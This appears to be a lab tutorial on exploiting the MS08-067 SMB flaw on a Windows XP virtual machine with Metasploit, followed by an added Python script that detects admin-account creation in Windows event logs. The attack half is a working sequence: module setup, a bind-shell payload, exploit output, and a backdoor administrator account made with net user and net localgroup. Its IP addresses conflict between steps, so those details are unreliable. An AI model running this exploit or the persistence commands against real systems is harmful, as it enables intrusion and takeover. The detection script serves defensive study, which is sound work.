The MS08-067 vulnerability affects every Windows system except Windows Server 2008 Core, including all editions of Windows 2000, XP, Server 2003, Vista and Server 2008, and even the pre-release Windows 7 Pre-Beta.
1. Install the target machine
Download the Windows XP SP3 English image and install it in a VMware virtual machine. Target IP: 192.168.65.128
2. Install Kali Linux and the Metasploit Framework
Note: both the system and the framework are installed through Docker, so some familiarity with Docker is needed first.
Start Docker and run docker pull kalilinux/kali-linux-docker to fetch the Kali Linux image.
Run docker run -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash
to create the container and run it interactively. Container IP: 172.17.0.2
Run git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
to fetch the Metasploit Framework.
When that finishes, run cd ./metasploit to enter the framework directory, then run ./msfconsole to start the framework:
root@b2e6af248097:/metasploit# ./msfconsole
Once it is up, follow these steps:
msf5 > use exploit/windows/smb/ms08_067_netapi # select the MS08-067 exploit module
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2 # set the local host IP
LHOST => 172.17.0.2
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128 # set the target host IP
RHOST => 192.168.65.129
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp # set the payload
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options # review the configuration

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.65.129   yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.65.129   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit # launch the attack
[*] 192.168.46.129:445 - Automatically detecting the target...
[*] 192.168.46.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.46.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.46.129:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.46.129:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.46.129:4444) at 2018-11-09 09:59:01 +0000
C:\WINDOWS\system32>
The attack succeeded and a command shell on the target host was obtained.
Next, create an account: add a user named xiayujie with the password xiayujie, and add the xiayujie user to the Administrators group.
C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully. # account added
With cmd shell access, you can do whatever you want next.
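The last step above (a local account created and immediately added to Administrators with net user / net localgroup) is exactly the post-exploitation pattern a blue team watches for in Windows Security logs. The script below is an added example for this writeup, not part of Metasploit or the original post: it runs simple detection logic over constructed, simplified event records (4720 user created, 4732 member added to a local group, 4688 process creation with command-line auditing) and flags (a) an account that is created and elevated to Administrators within a short window on the same host and (b) any command line that adds a member to the local Administrators group. The host names, times and field layout are assumptions made for the sample data.

```python
"""Detect the create-then-elevate pattern from the writeup above.

Added example (not from the original post or from Metasploit). The event
records are constructed here in a simplified form; in a real deployment the
same fields would come from parsed Windows Security events 4720 / 4732 / 4688.
"""
import re
from datetime import datetime, timedelta

# Constructed sample events (hypothetical host names and timestamps).
SAMPLE_EVENTS = [
    {"time": "2018-11-09 10:01:02", "host": "XPLAB", "id": 4688,
     "cmdline": "net user xiayujie xiayujie /add"},
    {"time": "2018-11-09 10:01:03", "host": "XPLAB", "id": 4720,
     "target": "xiayujie"},
    {"time": "2018-11-09 10:01:05", "host": "XPLAB", "id": 4688,
     "cmdline": "net localgroup administrators xiayujie /add"},
    {"time": "2018-11-09 10:01:06", "host": "XPLAB", "id": 4732,
     "target": "xiayujie", "group": "Administrators"},
    # Benign: a normal account is created and never elevated
    {"time": "2018-11-09 11:30:00", "host": "FILESRV", "id": 4720,
     "target": "temp01"},
    # Benign: an existing account is made admin a day later (outside the window)
    {"time": "2018-11-10 09:00:00", "host": "FILESRV", "id": 4732,
     "target": "temp01", "group": "Administrators"},
]

# Correlation window between account creation and elevation.
WINDOW = timedelta(minutes=5)

# Matches net / net1 (optionally with .exe) adding any member to the local
# Administrators group; case-insensitive because cmd.exe is.
NET_ADMIN_RE = re.compile(
    r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    re.IGNORECASE,
)


def parse_time(value):
    """Parse the simplified timestamp used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_create_then_elevate(events, window=WINDOW):
    """Return (host, user, seconds_between) for each account that was created
    (4720) and then added to Administrators (4732) on the same host within
    `window`. Events are processed in time order so the 4720 is always seen
    before the matching 4732."""
    created = {}  # (host, user) -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: parse_time(e["time"])):
        when = parse_time(ev["time"])
        key = (ev["host"], ev.get("target", "").lower())
        if ev["id"] == 4720:
            created[key] = when
        elif ev["id"] == 4732 and ev.get("group", "").lower() == "administrators":
            if key in created and when - created[key] <= window:
                delta = int((when - created[key]).total_seconds())
                hits.append((ev["host"], key[1], delta))
    return hits


def find_net_localgroup_add(events):
    """Return (host, cmdline) for process-creation events (4688) whose command
    line adds a member to the local Administrators group."""
    return [
        (ev["host"], ev["cmdline"])
        for ev in events
        if ev["id"] == 4688 and NET_ADMIN_RE.search(ev.get("cmdline", ""))
    ]


if __name__ == "__main__":
    for host, user, secs in find_create_then_elevate(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: account {user!r} created and made admin {secs}s later")
    for host, cmd in find_net_localgroup_add(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: Administrators group change via command line: {cmd}")
```

The two checks are deliberately independent: the 4688 rule catches the command even if the account already existed, while the 4720/4732 correlation catches elevation done through other tooling (for example the Computer Management MMC) where no net.exe command line is recorded.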